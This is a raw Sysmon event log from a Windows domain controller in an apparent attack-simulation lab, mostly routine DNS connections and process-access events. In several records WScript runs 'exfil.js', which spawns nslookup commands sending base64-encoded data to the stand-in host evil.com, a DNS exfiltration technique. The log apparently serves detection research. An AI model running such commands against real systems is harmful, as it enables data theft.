process>-udptruefalse127.0.0.1-52702-false127.0.0.1-53domain 354300x8000000000000000200355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.476{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52701- 354300x8000000000000000200354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.476{00000000-0000-0000-0000-000000000000}6148<unknown process>-udptruefalse127.0.0.1-52701-false127.0.0.1-53domain 354300x8000000000000000200353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.475{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52700- 354300x8000000000000000200352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.474{00000000-0000-0000-0000-000000000000}6148<unknown process>-udpfalsefalse127.0.0.1-52699-false127.0.0.1-53domain 10341000x8000000000000000200351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.415{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6F40-000000005F02}3552C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000200350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.474{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52699- 354300x8000000000000000200349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.474{00000000-0000-0000-0000-000000000000}6148<unknown process>-udptruefalse127.0.0.1-52699-false127.0.0.1-53domain 354300x8000000000000000200348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.342{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52698- 354300x8000000000000000200347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.341{00000000-0000-0000-0000-000000000000}7036<unknown process>-udpfalsefalse127.0.0.1-52697-false127.0.0.1-53domain 354300x8000000000000000200346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.341{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52697- 354300x8000000000000000200345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.334{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52696- 354300x8000000000000000200344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.169{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52695- 354300x8000000000000000200343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.168{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52694- 354300x8000000000000000200342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.167{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52693- 354300x8000000000000000200341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.958{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52692- 354300x8000000000000000200340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.958{00000000-0000-0000-0000-000000000000}5744<unknown process>-udptruefalse127.0.0.1-52692-false127.0.0.1-53domain 354300x8000000000000000200339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.958{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52691- 354300x8000000000000000200338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.958{00000000-0000-0000-0000-000000000000}5744<unknown process>-udpfalsefalse127.0.0.1-52690-false127.0.0.1-53domain 354300x8000000000000000200337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.958{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52690- 354300x8000000000000000200336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.836{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52689- 354300x8000000000000000200335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.729{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52688- 354300x8000000000000000200334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.728{00000000-0000-0000-0000-000000000000}4740<unknown process>-udpfalsefalse127.0.0.1-52687-false127.0.0.1-53domain 354300x8000000000000000200333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.728{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52687- 354300x8000000000000000200332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.728{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52686- 354300x8000000000000000200331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52685- 354300x8000000000000000200330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.618{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52684- 354300x8000000000000000200329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.617{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52683- 354300x8000000000000000200328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52682- 354300x8000000000000000200327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52681- 354300x8000000000000000200326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.537{00000000-0000-0000-0000-000000000000}608<unknown process>-udptruefalse127.0.0.1-52681-false127.0.0.1-53domain 354300x8000000000000000200325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.536{00000000-0000-0000-0000-000000000000}608<unknown process>-udpfalsefalse127.0.0.1-52680-false127.0.0.1-53domain 354300x8000000000000000200324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.536{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52680- 354300x8000000000000000200323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.536{00000000-0000-0000-0000-000000000000}608<unknown process>-udptruefalse127.0.0.1-52680-false127.0.0.1-53domain 354300x8000000000000000200322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.416{00000000-0000-0000-0000-000000000000}5908<unknown process>-udpfalsefalse127.0.0.1-52679-false127.0.0.1-53domain 10341000x8000000000000000200321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.395{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.416{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52679- 10341000x8000000000000000200319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.395{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.416{00000000-0000-0000-0000-000000000000}5908<unknown process>-udptruefalse127.0.0.1-52679-false127.0.0.1-53domain 10341000x8000000000000000200317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.395{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.416{00000000-0000-0000-0000-000000000000}5908<unknown process>-udpfalsefalse127.0.0.1-52678-false127.0.0.1-53domain 10341000x8000000000000000200315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.395{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.416{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52678- 10341000x8000000000000000200313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.395{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6E40-000000005F02}5720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000200312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.416{00000000-0000-0000-0000-000000000000}5908<unknown process>-udptruefalse127.0.0.1-52678-false127.0.0.1-53domain 354300x8000000000000000200311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.416{00000000-0000-0000-0000-000000000000}5908<unknown process>-udpfalsefalse127.0.0.1-52677-false127.0.0.1-53domain 10341000x8000000000000000200310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.395{2E1864BB-17A1-629A-783D-000000005F02}55527336C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-6E40-000000005F02}5720C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.406{2E1864BB-17BF-629A-6E40-000000005F02}5720C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlomvp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.379{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlystnf.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.364{2E1864BB-17BF-629A-6C40-000000005F02}57602256C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6D40-000000005F02}7288C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.364{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.364{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.364{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.364{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.364{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6D40-000000005F02}7288C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.364{2E1864BB-17BF-629A-6B40-000000005F02}41485164C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-6D40-000000005F02}7288C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.371{2E1864BB-17BF-629A-6D40-000000005F02}7288C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-6B40-000000005F02}4148C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlystnf.tmp 2>&1 10341000x8000000000000000200299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.348{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6C40-000000005F02}5760C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.348{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6C40-000000005F02}5760C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 